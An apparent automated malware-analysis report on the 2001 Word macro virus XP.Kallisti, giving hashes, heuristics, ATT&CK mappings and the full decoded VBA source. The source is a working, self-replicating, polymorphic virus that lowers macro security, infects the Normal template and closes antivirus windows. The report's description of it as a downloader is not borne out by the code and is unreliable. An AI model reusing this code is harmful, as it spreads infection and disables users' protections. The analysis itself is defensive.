Win.Trojan.Kallisti-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 0f0b789deebfd1a3…

MALICIOUS

Office (OLE)

Size: 37.5 KB | Created: 2001-03-18 12:14:00 | Authoring application: Microsoft Word 10.0 | First seen: 2012-06-14
MD5: 00e89c72491119d38f3b6435c3739a57
SHA-1: e20395afcb4de8c561823160dcdb8fb077e7e6e6
SHA-256: 0f0b789deebfd1a3769ed9fa88b88d6db830ba6713b3fc75e94edaaf3cfe3f78
Risk Score: 200

Malware Insights

Win.Trojan.Kallisti-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample contains a VBA macro that executes upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The script attempts to lower macro security settings by modifying registry keys, specifically 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM'. The macro also appears to deobfuscate and execute further code, suggesting it acts as a downloader for a secondary payload.

Heuristics (5)

  • ClamAV: Win.Trojan.Kallisti-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Kallisti-1
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    The document defines a Document_Open macro, which runs automatically when the document is opened
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    The macro instantiates a COM object via CreateObject
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4783 bytes
SHA-256: 892b3212133d66a220c7bceaadc69eee3abf66cf24f58b3621d4848400cf7abd
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
µÊ“©ˆ = µÊ“©ˆ + 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
WordBasic.FileExit dlg
End If
If VBA.GetAttr(Word.Application.ActiveDocument.FullName) = µÊ“©ˆ Then
VBA.SetAttr Word.Application.ActiveDocument.FullName, (Rnd * 0)
ActiveDocument.Reload
End If
VBA.SetAttr Word.Application.NormalTemplate.FullName, (Rnd * 0)
Options.SaveNormalPrompt = vbEmpty
Set ˳‚¬ˆ = VBA.IIf(Word.Application.MacroContainer = Word.Application.ActiveDocument, Word.Application.NormalTemplate, Word.Application.ActiveDocument)
With ˳‚¬ˆ.VBProject
With .vbcomponents.Item(µÊ“©ˆ).Codemodule
If Not .lines(90, µÊ“©ˆ) Like "'XP*" Then
.deletelines µÊ“©ˆ, .countoflines
.insertlines µÊ“©ˆ, ©¬–—»(Word.MacroContainer.VBProject.vbcomponents.Item(µÊ“©ˆ).Codemodule.lines(µÊ“©ˆ, 92))
If ˳‚¬ˆ = Word.Application.ActiveDocument Then Word.Application.ActiveDocument.SaveAs Word.Application.ActiveDocument.FullName, wdFormatDocument
End If
End With
End With
For �—ÈÊŸ = µÊ“©ˆ To Word.Tasks.Count
If VBA.InStr(µÊ“©ˆ, VBA.LCase(Word.Tasks(�—ÈÊŸ).Name), "vir") Then Word.Tasks(�—ÈÊŸ).Close
Next
If VBA.InStr(µÊ“©ˆ, VBA.Time, "5") Then
ˆ¼–„— = "Merlin"
Set •��±Ÿ = CreateObject("Agent.Control.1")
•��±Ÿ.Connected = True
If VBA.IsObject(•��±Ÿ) Then
•��±Ÿ.Characters.Load ˆ¼–„—, ˆ¼–„— & ".acs"
Set Ÿ¶™°� = •��±Ÿ.Characters(ˆ¼–„—)
With Ÿ¶™°�
.Top = 100
.Left = 100
.LanguageID = &H409
.Show
End With
Ÿ¶™°�.Play "Greet"
Ÿ¶™°�.Speak "Hello, " & Word.Application.UserName & "!" & "\Vol=99"
Ÿ¶™°�.Play "GetAttention"
Ÿ¶™°�.Play "GetAttentionReturn"
Ÿ¶™°�.Speak "I said: 'Hello " & Word.Application.UserName & "!" & Chr(39)
Ÿ¶™°�.Play "Idle2_2"
Ÿ¶™°�.Speak "Let me tell you something about a confused girl..."
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "...once she turned around and thought,"
Ÿ¶™°�.Play "Idle1_2"
Ÿ¶™°�.Speak "how damn simple it is,"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "leaving a man she once loved,"
Ÿ¶™°�.Play "Idle2_1"
Ÿ¶™°�.Speak "but she did not notice,"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "that her heart had become deaf by the pain..."
Ÿ¶™°�.Play "Acknowledge"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "Oh, I forgot..."
Ÿ¶™°�.Play "Idle2_1"
Ÿ¶™°�.Speak "I think you are infected with XP.Kallisti...(the first virus for Office XP ever)"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "Damn... I have to go now..."
Ÿ¶™°�.MoveTo 800, 600
Ÿ¶™°�.Play "Idle3_1"
Ÿ¶™°�.Play "Wave"
Ÿ¶™°�.Speak "Goodbye now " & Word.Application.UserName & "!"
Set ެ‡£Ä = Ÿ¶™°�.Hide
Do Until ެ‡£Ä.Status = 0
VBA.DoEvents
Loop
•��±Ÿ.Characters.Unload ˆ¼–„—
End If
End If
End Sub
Private Function ©¬–—»(‚º¾¶„) 'Oh my god, it's poly...xD
µÊ“©ˆ = µÊ“©ˆ + 1
 Á¼�É = "©¬–—» ‚º¾¶„  Á¼�É Â…Èœ¨ º…­¤— ¯±”•¿ ¾­ÊÅ’ µÊ“©ˆ ˳‚¬ˆ ˆ¼–„— �—ÈÊŸ •��±Ÿ Ÿ¶™°� ެ‡£Ä "
Do
¾­ÊÅ’ = VBA.Left( Á¼�É, VBA.InStr( Á¼�É, VBA.Chr(32)) - µÊ“©ˆ):  Á¼�É = VBA.Mid( Á¼�É, VBA.InStr( Á¼�É, VBA.Chr(32)) + µÊ“©ˆ)
º…­¤— = VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129))
Do
¯±”•¿ = VBA.InStr(¯±”•¿ + µÊ“©ˆ, VBA.LCase(‚º¾¶„), VBA.LCase(¾­ÊÅ’))
If ¯±”•¿ Then ‚º¾¶„ = VBA.Mid(‚º¾¶„, µÊ“©ˆ, (¯±”•¿ - µÊ“©ˆ)) & º…­¤— & VBA.Mid(‚º¾¶„, (¯±”•¿ + VBA.Len(¾­ÊÅ’)))
Loop While ¯±”•¿
Loop While  Á¼�É <> ""
©¬–—» = ‚º¾¶„
End Function
'XP.Kallisti
'(c) 2001 jackie // linezer0